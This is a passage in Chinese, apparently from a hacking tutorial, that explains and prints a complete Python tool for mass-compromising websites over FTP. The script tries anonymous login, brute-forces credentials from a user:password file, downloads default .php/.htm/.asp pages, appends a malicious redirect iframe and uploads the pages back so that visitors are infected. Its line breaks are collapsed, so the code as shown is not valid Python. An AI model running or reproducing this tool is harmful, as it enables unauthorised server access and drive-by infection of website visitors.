1、attack()函數的輸入參數包括一個用戶名、密碼、主機名和重定向的位置。該函數首先用用戶名/密碼登錄FTP 服務器。
2、 這個腳本會搜索默認網頁,並下載每個被找到的網頁, 並在其中加入惡意重定向代碼。
3、 腳本會將被掛馬的網頁傳回FTP 服務器, 任何訪問該Web 服務器的機器都將會被黑
def attack(username, password, tgtHost, redirect): ftp = ftplib.FTP(tgtHost) ftp.login(username, password) defPages = returnDefault(ftp) for defPage in defPages: injectPage(ftp, defPage, redirect)
通過添加一些命令行參數的解析代碼, 完成整個腳本
首先看FTP 服務器能不能匿名訪問。不能, 就暴力破解口令,能破解出口令或FTP 能匿名登錄, 登錄到FTP 站點上去發動攻擊。盡管只用了數百行代碼, 但它完全復制了k985ytv 攻擊中使用的攻擊載體。
import ftplib import optparse import time def anonLogin(hostname): try: ftp = ftplib.FTP(hostname) ftp.login('anonymous', 'password') print('\n(*) ' + str(hostname) + ' FTP Anonymous Logon Succeeded.') ftp.quit() return True except Exception as e: print('[*]' + str(e)) print('\n[-]' + str(hostname) + 'FTP Anonymous Logon Failed.') return False def bruteLogin(hostname, passwdFile): pF = open(passwdFile, 'r') for line in pF.readlines(): time.sleep(1) userName = line.split(':')[0] passWord = line.split(':')[1].strip('\r').strip('\n') print('[+] Trying: ' + userName + '/' + passWord) try: ftp = ftplib.FTP(hostname) ftp.login(userName, passWord) print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + userName + '/' + passWord) ftp.quit() return (userName, passWord) except Exception as e: pass print('\n[-] Could not brute force FTP credentials') return (None, None) def returnDefault(ftp): try: dirList = ftp.nlst() except: dirList = [] print('[-] Could not list directory contents.') print('[-] Skipping To Next Target.') return retList = [] for fileName in dirList: fn = fileName.lower() if '.php' in fn or '.htm' in fn or '.asp' in fn: print('[+] Found default page: ' + fileName) retList.append(fileName) return retList def injectPage(ftp, page, redirect): f = open(page + '.tmp', 'w') ftp.retrlines('RETR ' + page, f.write) print('[+] Downloaded Page: ' + page) f.write(redirect) f.close() print('[+] Injected Malicious IFrame on: ' + page) ftp.storlines('STOR ' + page, open(page + '.tmp')) print('[+] Uploaded Injected Page: ' + page) def attack(username, password, tgtHost, redirect): ftp = ftplib.FTP(tgtHost) ftp.login(username, password) defPages = returnDefault(ftp) for defPage in defPages: injectPage(ftp, defPage, redirect) def main(): parser = optparse.OptionParser('usage%prog ' + '-H <target host[s]> -r <redirect page>' + '[ -f <userpass file>]') parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host') parser.add_option('-f', dest='passwdFile', type='string', help='specify user/password file') parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page') (options, args) = parser.parse_args() tgtHosts = str(options.tgtHosts).split(', ') passwdFile = options.passwdFile redirect = options.redirect if tgtHosts == None or redirect == None: print(parser.usage) exit(0) for tgtHost in tgtHosts: username = None password = None if anonLogin(tgtHost) == True: username = 'anonymous' password = '' print('[+] Using Anonymous Creds to attack') attack(username, password, tgtHost, redirect) elif passwdFile != None: (username, password) = \ bruteLogin(tgtHost, passwdFile) if password != None: print('[+] Using Creds: ' + username + '/' + password + ' to attack') attack(username, password, tgtHost, redirect) if __name__ == '__main__': main()